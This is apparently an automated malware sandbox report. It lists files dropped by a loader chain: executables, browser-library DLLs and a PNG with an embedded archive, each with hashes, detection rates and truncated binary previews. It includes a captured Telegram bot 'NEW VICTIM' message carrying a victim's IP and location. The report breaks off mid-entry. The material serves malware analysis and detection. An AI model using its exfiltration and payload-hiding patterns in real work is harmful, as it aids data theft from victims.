C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1959936
Entropy (8bit):	7.94126932718358
Encrypted:	false
SSDEEP:	49152:AzXj2IxFyhnVCQxf1xpWkD2heruPYgW597Ky:AnNxFSVnfDs028aPYg2My
MD5:	63941836D5C054B13AE7B96F743C38CB
SHA1:	194FCA3EFEB1C402150A20CBB78222E779319011
SHA-256:	C18EE07AD8E0958F78B1C943CF49923B8C18E7A2851730325D1FF40F0DA3D033
SHA-512:	06ED190D98D3B9B20785EA2AE2C2A787C209E6DD34F3DEB0254E5B092DD16CEB48AE2185FE9F943A3145E2683707530057C4C3FC4B9B9C719D2295B3BBD4E8E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@.......0............@..........................`..............................................[.A.o.....@............................................................................................................. . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..)...A.....................@...tsdsdsrb.....0k.....................@...qtylzonp..... ......................@....taggant.0...0..."..................@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2809344
Entropy (8bit):	6.477052744116312
Encrypted:	false
SSDEEP:	49152:QfYy9jPgXFxLSsM6FN8+c6aoflDx31DXZdCQS:QfYy9jYXFtSsDFU6T5HnCQ
MD5:	1F915A2A7DD42C289E8782993830F2A4
SHA1:	DE26B9563EE852705764D2F0144BABB2386EEB00
SHA-256:	BF28DB1E7F9E26CC3A8E9184B031257300AC975C8E51A76C7F5C4A8600D598CA
SHA-512:	EF2886D7D651CAD6A89BF7ADF946653D83E7A37E4453E795A81FD269135159043BCBB9188C6101E4B3F9AEF9A2612169678AB935FDAB4BAA2D5792CA2121B29F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... +.. ...`....@.. .......................`+......G+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...osxguznn.`......P..h..............@...nksckbfu. ....+....................@....taggant.@... +..".................@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\sendMessage[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	777
Entropy (8bit):	5.1096112526781425
Encrypted:	false
SSDEEP:	24:YKOHwy1JVBa4YGQVPe071kW6PyoZEB6casJENBm9c:YVHwQTBj/Q51OPtZAujMc
MD5:	1DA944F01BF26191CD3C9AD09CB3CA0A
SHA1:	3C95F9913705A5B58FBBF0B633C8AC228AEE4A1B
SHA-256:	4AA7FA0EC20194A8D16D1B3EDEF508C9638ECD1C9F3EE0566924909EC4CE6A4A
SHA-512:	9F3174C81CE06AAED87ABDFB0A2DA1D21DA97564AD4C323E554462DD52B25DE65A7B04BC3486E7D82417FFE2EFC9B794E77B97610E563CB739012961006C4C92
Malicious:	false
Reputation:	unknown
Preview:	{"ok":true,"result":{"message_id":30111,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734830220,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 715575\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\add[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\download[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].png, Author: ditekSHen
Reputation:	unknown
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	776832
Entropy (8bit):	7.859727158445845
Encrypted:	false
SSDEEP:	12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
MD5:	AFD936E441BF5CBDB858E96833CC6ED3
SHA1:	3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
SHA-256:	C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
SHA-512:	928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4470272
Entropy (8bit):	7.9867020415782
Encrypted:	false
SSDEEP:	98304:zpBNrmu/zIr0Bvz6wuLAg7TeYbymqQMu0b9vyjftgQ+MV96YGzR:zrEQK06nLJ7TH90xvcV5GN1
MD5:	A42B5A11FB98E17DCA2EA358EAC541DE
SHA1:	DB5DDCC295E6C1F418514877C76A73DA72F6F048
SHA-256:	500E3C9C865A5F7652B4404874638619B550941F9548A3FDE796BB143E9DEA65
SHA-512:	66A167BE34AC5BF65221AF4D5DB2B324E28C0626ED371353B4177EEB8622367CFB3FAC0DF7BB1C9C7A4820D6BFF85C4AC3A793A27564E867DBB2BF3509EE8C9F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fg...............(..N...t..2...p........N...@................................./XD...@... ............................._.r.s.....r......................V...............................V...................................................... . ..q.......(.................@....rsrc.........r.......(.............@....idata ......r.......(.............@... ..8.. r.......(.............@...dsmoqcnp.`.......Z....(.............@...yktdnnda.....`........D.............@....taggant.0...p..."....D.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2955776
Entropy (8bit):	6.505583623051967
Encrypted:	false
SSDEEP:	49152:e4XShScaTlV24ye5LeQqhpmS33KuUlWqIvk3V:rXGScaTlVHzaQ40S3aXIvm
MD5:	F853C23F7A2641FEB4E4B94F59728314
SHA1:	61CABF70A8F02D03F3D771D7414F13BB4F5E93E7
SHA-256:	F5775B1466343C02707A800979059C47058B31F9E8F4CE90ADA77EADCF1378AF
SHA-512:	873410169C05C6AAB4B8838527403BDDB6FDA234A9CC0E2BBB64D7422A1083293B399B5DB83114687802511024B47B5DE6252AC70DC25B2E606BBFF30E07B548
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(.......PP...........@...........................P...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...syphqzjl..+...$..v+..\|..............@...tdmszgwn.....@P.......,.............@....taggant.0...PP.."....,.............@...........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3263488
Entropy (8bit):	6.675956678732107
Encrypted:	false
SSDEEP:	24576:O/Nvd7MjWuH7NZRmw3vb+VBi7cCgTUvRS6r0EexLRdno+gSMW7GQJKTJjmX0/4hH:kliWo533j+na3bJrGYnlCJMdPS/b
MD5:	CF6393E173FB6315D0C681BC78EB3528
SHA1:	26DC307AE4EA1866D40C9A34E38768733EC30B34
SHA-256:	3DEE7134CBEEA75160519A338FC848A18AF80C46EF475FCD3C69A463D449C35D
SHA-512:	47E722C9F4736FAF9612AFF748CB4E1211E00FFE0FE56A65DC0DBEC07F7B5E81908269D7C31066250866F3459727874D88C27FA88BE08E540D0EB1E048CED61F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2.......1...@.................................W...k.............................1.............................D.1..................................................... . ............................@....rsrc...............................@....idata ............................@...dblbhqnk..+.......+.................@...rrjzixml......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2668544
Entropy (8bit):	6.1024828899386625
Encrypted:	false
SSDEEP:	49152:CAT1rDm9Jeg99E2spwr44UaaDB8v+oyLfwt3LE3eFqZHNZ25WYDo6fsWc6jlOaSo:CATNI9G2sOr44UaaDB8moVt3LE3eFqZw
MD5:	87330F1877C33A5A6203C49075223B16
SHA1:	55B64EE8B2D1302581AB1978E9588191E4E62F81
SHA-256:	98F2344ED45FF0464769E5B006BF0E831DC3834F0534A23339BB703E50DB17E0
SHA-512:	7C747D3EDB04E4E71DCE7EFA33F5944A191896574FEE5227316739A83D423936A523DF12F925EE9B460CCE23B49271F549C1EE5D77B50A7D7C6E3F31BA120C8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 22%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.Gra.)!a.)!a.)!.** l.)!., ..)!.- r.)!p-* s.)!p-- q.)!p-, G.)!.( d.)!a.(!?.)!.-! `.)!.-.!`.)!.-+ `.)!Richa.)!................PE..L.....eg.................&.........P.#.......&...@...........................).......(...@...................................'.<.....'.}.....................(..j....'.T...........................@.'.@.............&.@............................text.....&.......&................. ..`.rdata..,.....&.......&.............@..@.data.........'.......'.............@....fptable......'.......'.............@....rsrc...}.....'.......'.............@..@.reloc...j....(..l...L(.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	776832
Entropy (8bit):	7.859727158445845
Encrypted:	false
SSDEEP:	12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
MD5:	AFD936E441BF5CBDB858E96833CC6ED3
SHA1:	3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
SHA-256:	C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
SHA-512:	928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1861632
Entropy (8bit):	7.947162986091251
Encrypted:	false
SSDEEP:	49152:pXszOuMpJuVj4ozSuhfA6CFRStA4LyHY7LJAf:ezDMeVj2ICFRFOyHY7LJi
MD5:	15709EBA2AFAF7CC0A86CE0ABF8E53F1
SHA1:	238EBF0D386ECF0E56D0DDB60FACA0EA61939BB6
SHA-256:	10BFF40A9D960D0BE3CC81B074A748764D7871208F324DE26D365B1F8EA3935A
SHA-512:	65EDEFA20F0BB35BEE837951CCD427B94A18528C6E84DE222B1AA0AF380135491BB29A049009F77E66FCD2ABE5376A831D98E39055E1042CCEE889321B96E8E9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................PI...........@...........................I.....IA....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...wekcazbo.....P/......^..............@...ttllozcv.....@I......@..............@....taggant.0...PI.."...F..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439296
Entropy (8bit):	6.4903731089009495
Encrypted:	false
SSDEEP:	12288:v4RG6lx/9Njr18QlSfJy4FjMSkJCzDLGDWD:O9NtSTZMzmmD4
MD5:	51FF79B406CB223DD49DD4C947EC97B0
SHA1:	B9B0253480A1B6CBDD673383320FECAE5EFB3DCE
SHA-256:	2E3A5DFA44D59681A60D78B8B08A1AF3878D8E270C02D7E31A0876A85EB42A7E
SHA-512:	C2B8D15B0DC1B0846F39CE007BE2DEB41D5B6AE76AF90D618F29DA8691ED987C42F3C270F0EA7F4D10CBD2D3877118F4133803C9C965B6FF236FF8CFAFD9367C
Malicious:	true
